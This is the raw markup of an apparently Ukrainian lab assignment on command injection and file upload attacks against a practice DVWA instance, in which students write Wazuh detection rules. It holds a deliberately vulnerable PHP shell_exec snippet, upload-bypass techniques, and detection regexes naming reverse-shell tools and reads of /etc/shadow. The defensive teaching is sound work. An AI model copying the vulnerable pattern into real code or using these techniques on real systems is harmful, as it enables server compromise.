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0F99" w14:textId="63970FBF" w:rsidR="001A6718" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="00E179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49F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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AD2F6" w14:textId="77777777" w:rsidR="00FB1FF8" w:rsidRDefault="00E1799F" w:rsidP="00E179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ТА ВИЯВЛЕННЯ АТА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E17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JECTIO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543FB4A" w14:textId="6CE9ECB5" w:rsidR="0009049F" w:rsidRPr="00E1799F" w:rsidRDefault="00E1799F" w:rsidP="00E179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17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LOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D118F5" w14:textId="409E1BB4" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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49F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Мета роботи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99A4C8" w14:textId="3A185FF0" w:rsidR="0009049F" w:rsidRDefault="00E1799F" w:rsidP="00E1799F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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механізмів експлуатації вразливостей типу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E17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E17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17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11F506" w14:textId="00AC6F0C" w:rsidR="0009049F" w:rsidRDefault="00E1799F" w:rsidP="00E1799F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ідходів до виявлення відповідних атак шляхом аналізу логів та формування правил виявлення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Wazu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A6C81" w14:textId="6DC3A3D9" w:rsidR="0009049F" w:rsidRDefault="00E1799F" w:rsidP="00E1799F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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практичних навичок аналізу потенційних інцидентів безпеки та визначення їх критичності.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D97CF" w14:textId="4ADB850D" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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49F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14:paraId="628C11CC" w14:textId="3E972009" w:rsidR="0009049F" w:rsidRPr="002D057D" w:rsidRDefault="0009049F" w:rsidP="000904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jection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4C074" w14:textId="3E56F063" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009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е клас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зливостей, за якого веб-додаток передає неконтр</w:t>
      </w:r>
      <w:r w:rsidR="001C472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ьовані вхідні дані користувача безпосередньо до системної оболонки (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uk-UA"/>
        </w:rPr>
        <w:t>). У результаті зловмисник може виконати довільні команди операційної системи від імені процесу веб-сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB7173" w14:textId="128AAB6C" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009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практиці це означає можливість:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF030E" w14:textId="3A3AEB1B" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ня інформації про систему (наприклад, користувач, версія ОС тощо).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A390A" w14:textId="056A9010" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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ння критичних файлів конфігурації (наприклад, </w:t>
      </w:r>
      <w:r w:rsidRPr="000904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0904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4256AC9" w14:textId="1FFFB282" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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ації або створення файлів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6FE06C" w14:textId="2AD4B7B7" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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лення доступу через бекдори.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98A393" w14:textId="7FB035DB" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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скомпрометованого хоста для подальшого руху мережею (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lateral movement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60F0A72" w14:textId="62BD5900" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049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а причина виникнення вразливості – відсутність валідації або екранування користувацького вводу перед передачею його в системну команду.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C31D7" w14:textId="5CF67BFE" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049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ий приклад вразливої реалізації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9049F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240ABC39" w14:textId="77777777" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE39A84" w14:textId="77777777" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ip = $_GET['ip'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABA28E" w14:textId="77777777" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$output = shell_exec("ping -c 4 " . $ip);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87EAF2" w14:textId="77777777" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo "&lt;pre&gt;$output&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496F7F8" w14:textId="784CF2B8" w:rsidR="0009049F" w:rsidRPr="002D057D" w:rsidRDefault="0009049F" w:rsidP="0009049F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="002D057D">
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF9942" w14:textId="4E572F0C" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009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фрагменті значенн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9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перевірки додається до рядка команди. Якщо замі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904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и передати спеціальні символи оболонки, можна змінити логіку виконання.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4B05C" w14:textId="1792311D" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009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приклад, введення додаткового оператора дозволяє виконати ще одну команду в тому ж контексті. Саме механізм об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0904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претатором символів </w:t>
      </w:r>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">;, &amp;&amp;, |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новок типу </w:t>
      </w:r>
      <w:r w:rsidRPr="0009049F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$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зворотних лапок створює поверхнею атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E72F4BC" w14:textId="29F7331C" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="00090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Експлуатація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9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09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ується на використанні операторів керування оболонкою:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B707604" w14:textId="64FA601E" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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;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ення команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464923F0" w14:textId="312F107C" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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49F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&amp;&amp;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наступної команди за умови успіху попередньої.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56898605" w14:textId="2C53C042" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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и помилці попередньої.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E00D0" w14:textId="573C2307" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|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у виводу однієї команди </w:t>
      </w:r>
      <w:r w:rsidR="0081415B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>як вводу іншої.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295687BD" w14:textId="7901E157" w:rsidR="0009049F" w:rsidRDefault="0009049F" w:rsidP="0009049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15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">$() </w:t>
      </w:r>
      <w:r w:rsidR="0081415B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>або зворотні лапки – підстановка результату виконання команди.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EBBCB" w14:textId="1889DA4F" w:rsidR="0081415B" w:rsidRPr="002D057D" w:rsidRDefault="0081415B" w:rsidP="008141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15B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1415B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w: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1415B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B88C46A" w14:textId="22C700D0" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="00814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ack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е експлуатація функціоналу завантаження файлів для розміщення на сервері шкідливого або небезпечного контенту. У разі некоректної перевірки типу, розширення чи вмісту файлу можливе виконання коду на стороні сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47770062" w14:textId="5AFB7C80" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="00814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йбільш критичний сценарій – завантаження веб-шелу, який дозволяє виконувати системні команд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4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и. Це фактично призовдить до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CE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E423B2" w14:textId="0B7F5C74" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="00814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с атак на механізм завантаженян файлів застосовуються такі підходи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A8EF4" w14:textId="0A527882" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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війні розширення – наприклад, файл може містити декілька розширень, де сервер інтерпретує останнє як виконуване.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E5D9E3" w14:textId="28055942" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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вка коду у зображення – додавання виконуваного коду після валідного заголовка файлу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E0FD1" w14:textId="32842A0C" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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ull</w:t>
      </w:r>
      <w:r w:rsidRPr="0081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1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81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ктуально для застарілих версій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uk-UA"/>
        </w:rPr>
        <w:t>) – обхід перевірки рядків шляхом штучного обриву.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944EC83" w14:textId="2D248073" w:rsidR="0081415B" w:rsidRPr="00E1799F" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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іпуляція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81415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м – підміна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81415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415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ів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157746EA" w14:textId="245AB19E" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="008141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катори атак у журналах подій</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CD06B" w14:textId="5205BAFB" w:rsidR="0081415B" w:rsidRPr="002D057D" w:rsidRDefault="0081415B" w:rsidP="00814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2D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2D057D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3067A" w14:textId="54ECEF6B" w:rsidR="0081415B" w:rsidRPr="0081415B" w:rsidRDefault="0081415B" w:rsidP="008141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спеціальних символів оболонки в параметрах запиту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9B8C9" w14:textId="64403450" w:rsidR="0081415B" w:rsidRPr="0081415B" w:rsidRDefault="0081415B" w:rsidP="008141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и звернення до системних файлів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E23D37B" w14:textId="3570A235" w:rsidR="0081415B" w:rsidRPr="0081415B" w:rsidRDefault="0081415B" w:rsidP="008141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мережевих або системних утиліт у вхідних даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B96B5" w14:textId="74457E23" w:rsidR="0081415B" w:rsidRPr="0081415B" w:rsidRDefault="0081415B" w:rsidP="008141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типові параметри в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141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14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х.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29050957" w14:textId="498B15C0" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B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к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1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81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ак:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE50FF" w14:textId="670CA267" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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ення файлів із підозрілими або подвійними розширеннями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF334A" w14:textId="7D5A5883" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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ідповід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814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ипу фактичному вмісту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E028E42" w14:textId="23046EFF" w:rsidR="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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льші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4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и до завантажених файлів із параметрами, характерними для виконання команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C22E966" w14:textId="6D66A0DC" w:rsidR="0081415B" w:rsidRPr="0081415B" w:rsidRDefault="0081415B" w:rsidP="0081415B">
      <w:pPr>
        <w:pStyle w:val="a3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мально великі або нетипові файли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC221A" w14:textId="4314D58F" w:rsidR="0009049F" w:rsidRPr="0009049F" w:rsidRDefault="0009049F" w:rsidP="000904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49F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09152C1D" w14:textId="7A7ACFA9" w:rsidR="0009049F" w:rsidRDefault="002D057D" w:rsidP="002D05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середовища.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D0A5D" w14:textId="3C15C5B7" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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тіть необхідні сервіси:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBFC65" w14:textId="77777777" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D057D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./lab-management.sh start vuln-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E93E8" w14:textId="2A4EDF30" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>./lab-management.sh start wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5AAEBF" w14:textId="65C1A51D" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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йте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA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FCB939" w14:textId="72B7EEFB" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF5F41" w14:textId="24393845" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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війдіть в обліковий запис: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D057D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307DD1" w14:textId="51249551" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA Security: L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968C3B" w14:textId="7B66B148" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D0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D03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власних правил для виявлення атак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2D2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2D2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D2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7FF619" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="003B650C" w:rsidRDefault="002D2D03" w:rsidP="002D2D03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рміналі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F53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53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хост) за допомогою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F5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йте файл з правилами командою:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10EBD5" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="003B650C" w:rsidRDefault="002D2D03" w:rsidP="002D2D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BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sudo nano /var/lib/docker/volumes/soc-lab_wazuh_etc/_data/rules/local_rules.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8207C2" w14:textId="11155800" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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D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дал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а, створені в ході виконання ЛР№6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D2D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334208C" w14:textId="2DAC0D2B" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D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йте в кінець файлу правила виявлення атаки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35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D1705A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>&lt;!-- Command Injection Detection Rules --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD01034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>&lt;group name="command_injection,web,attack,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A56C2" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AF2F57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!-- Detect command chaining characters --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7CE6E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rule id="100050" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B774A25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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6454C5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regex type="pcre2"&gt;(%3B|;|%7C|\||%26%26|&amp;amp;&amp;amp;|\$\(|`)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614CF9F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description&gt;Command Injection attempt: Command chaining detected&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E0098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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6219AE65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  &lt;id&gt;T1059&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44371B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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02B53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/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EDDCFD" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344394A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!-- Detect system commands in URLs --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9993D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rule id="100051" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48688E34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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2440F2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regex type="pcre2"&gt;(?i)(whoami|/etc/passwd|/etc/shadow|uname|id\s|ls\s|cat\s|pwd|wget|curl)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC7EDE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description&gt;Command Injection attempt: System command detected&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC0DB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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A65A08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  &lt;id&gt;T1059&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D89BC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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC1374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/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E328F9" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A7BE8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!-- Detect reverse shell attempts --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C446A3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rule id="100052" level="15"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB12BA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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA282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regex type="pcre2"&gt;(?i)(bash.*-i|nc.*-e|/dev/tcp|python.*socket)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE293E4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description&gt;Command Injection attempt: Reverse shell detected&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42506F1D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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C38AD9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  &lt;id&gt;T1059&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B25C1B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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F845744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/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314B547" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7B3C02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!-- Detect file operations --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA030D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rule id="100053" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113D9F8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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DED8B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regex type="pcre2"&gt;(?i)(chmod|chown|rm\s|mv\s|cp\s)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE96EF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;description&gt;Command Injection attempt: File operation command&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE11376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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB46388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  &lt;id&gt;T1059&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B2972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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B99107" w14:textId="43FD7855" w:rsidR="007D1D84" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54796A0F" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6AB2C" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="007D1D8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йте в кінець файлу правила виявлення атак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5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352FF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C419C2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>&lt;!-- File Upload Attack Detection Rules --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FCCCC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>&lt;group name="file_upload,web,attack,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45307F08" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70863656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!-- Detect PHP file uploads --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF78AD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rule id="100060" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325735F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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
